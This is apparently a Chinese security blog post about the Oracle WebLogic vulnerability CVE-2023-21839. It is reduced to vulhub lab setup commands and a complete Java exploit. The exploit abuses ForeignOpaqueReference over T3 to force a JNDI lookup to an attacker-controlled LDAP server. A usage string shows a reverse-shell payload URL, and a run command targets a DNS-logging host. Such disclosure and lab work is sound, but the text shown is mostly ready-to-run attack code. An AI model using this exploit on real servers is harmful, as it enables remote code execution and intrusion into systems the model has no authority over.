git clone https://github.com/vulhub/vulhub.git
docker-compose up -d
weblogic.deployment.jms.ForeignOpaqueReference.class
weblogic.jndi.internal.ForeignOpaqueReference.class
import javax.naming.Context;import javax.naming.InitialContext;import javax.naming.NamingException;import java.lang.reflect.Field;import java.util.Hashtable;import java.util.Random;public class CVE_2023_21839 {static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";static String HOW_TO_USE="[*]java -jar 目标ip:端口 ldap地址\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";private static InitialContext getInitialContext(String url)throws NamingException{Hashtable<String,String> env = new Hashtable<String,String>();env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);env.put(Context.PROVIDER_URL, url);return new InitialContext(env);}public static void main(String args[]) throws Exception {if(args.length <2){System.out.println(HOW_TO_USE);System.exit(0);}String t3Url = args[0];String ldapUrl = args[1];InitialContext c=getInitialContext("t3://"+t3Url);Hashtable<String,String> env = new Hashtable<String,String>();env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");jndiEnvironment.setAccessible(true);jndiEnvironment.set(f,env);Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");remoteJNDIName.setAccessible(true);remoteJNDIName.set(f,ldapUrl);String bindName = new Random(System.currentTimeMillis()).nextLong()+"";try{c.bind(bindName,f);c.lookup(bindName);}catch(Exception e){ }}}
java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/test
参考链接:
本文作者:Timeline Sec
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/199304.html
必填 您当前尚未登录。 登录? 注册
必填(保密)